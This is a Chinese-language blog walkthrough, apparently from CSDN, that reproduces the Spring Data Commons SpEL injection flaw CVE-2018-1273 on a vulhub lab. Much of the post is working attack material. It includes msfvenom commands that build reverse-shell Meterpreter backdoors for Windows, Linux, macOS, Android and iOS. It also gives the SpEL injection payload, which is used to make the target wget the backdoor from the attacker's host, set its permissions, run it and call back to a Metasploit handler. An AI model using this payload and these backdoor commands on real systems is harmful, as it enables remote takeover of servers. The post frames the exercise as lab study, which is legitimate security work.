spring(CVE-2018-1273)远程代码执行漏洞复现

漏洞说明

Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。

漏洞影响范围

  • Spring Data Commons 1.13至1.13.10(Ingalls SR10)
  • Spring Data REST 2.6至2.6.10(Ingalls SR10)
  • Spring Data Commons 2.0至2.0.5(Kay SR5)
  • Spring Data REST 3.0至3.0.5(Kay SR5)

以上就是CVE-2018-1273的说明,接下来就来准备我们的漏洞复现的实验环境

使用的靶场是vulhub如果没有安装,请看下面的链接进行安装靶场

在docker容器中安装vulhub靶场环境

攻击机:kali -- 192.168.159.134

目标机:ubuntu -- 192.168.159.137

漏洞复现

1.开启我们的靶机环境

  • docker-compose build
  • docker-compose up -d

一个简单的用户注册功能

2.使用kali配置后门木马

生成windows系统文件格式为EXE的木马
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -e x86/shikata_ga_nai -i 3 -b '\x00\x0a\xff' -f exe -o payload.exe

生成windows系统文件格式为DLL的木马
msfvenom -p windows/meterpreter/reverse_tcp -b'\x0\x0b' lhost=192.168.1.20 lport=9999 -f dll > payload.dll

生成32位Linux系统文件格式为EIF的木马
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

生成64位Linux系统文件格式为EIF的木马
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

生成Linux系统文件格式为SO的木马
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.1.20 lport=9999 -f elf-so -o payload.so

生成32位MAX系统文件格式为MACHO的木马
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp -b '\x00\0b' lhost=192.168.1.20 lport=9999 -f macho -o payload.macho

生成64位MAX系统文件格式为MACHO的木马
msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp -b '\x00\0b' lhost=192.168.1.20 lport=9999 -f macho -o payload.macho

生成Android系统文件格式为APK的木马
msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -o payload.apk

生成IOS系统文件格式为APK的木马
msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost=192.168.1.20 lport=9999 -o payload.ios

因为目标机是ubuntu系统,所以我们的需要配置的是linux的后门

这里的lhost改成我们攻击机的IP地址 iport改成我们监听的端口号
msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' lhost=192.168.159.134 lport=4444 -f elf -o payload.elf

可以看到在目录上生成了一个payload.elf的文件这就是我们的木马后门需要上传到靶机上去

3.开启http服务将kali中的8000端口映射出去

python3 -m http.server 8000

现在我们的准备工作都准备好了现在来进行CVE-2018-1273远程代码执行漏洞的复现

漏洞的代码注入格式

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('执行的命令')")]=asdf

4.使用burpsuite进行请求包的拦截进行重发包

wget 192.168.159.134:8000/payload.elf命令为对kali机中的后门进行下载

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('wget 192.168.159.134:8000/payload.elf')")]=asdf

  • 命令执行成功了看到了目标机已经下载了攻击机中的后门文件

5.对后门文件进行加权限

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('chmod 777 payload.elf')")]=asdf

 6.打开msfconsole进行4444端口监听

use exploit/multi/handler

# 因为目标机是linux所以要用linux的payload
set payload linux/x64/meterpreter/reverse_tcp

# 设置我们攻击机的ip地址
set LHOST  192.168.159.134

# 设置木马设置的反弹端口
set LPORT 4444

7.在目标机中运行后门文件

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('./payload.elf')")]=asdf

然后可以看到目标机的已经连接到我们的攻击机上了,这个漏洞就复现完成了 

有CVE-2018-1273远程代码执行的漏洞尽量赶快跟新版本以免造成不可以避免的损失

  • 66
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
根据引用\[1\]和引用\[2\]的信息,CVE-2022-22947漏洞Spring Cloud Gateway中的一处命令注入漏洞。攻击者可以通过利用此漏洞执行SpEL表达式,从而在目标服务器执行任意恶意代码,获取系统权限。具体来说,当使用Spring Cloud Gateway的应用程序对外暴露了Gateway Actuator接口时,攻击者可以发送恶意请求,利用漏洞进行代码注入攻击,从而在远程主机上执行任意远程代码。这个漏洞的影响范围包括Spring Cloud Gateway 3.1.x < 3.1.1和Spring Cloud Gateway 3.0.x < 3.0.7版本,以及其他旧的、不受支持的Spring Cloud Gateway版本。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947)](https://blog.csdn.net/qq_49619863/article/details/127350543)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现](https://blog.csdn.net/weixin_45260839/article/details/124650584)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值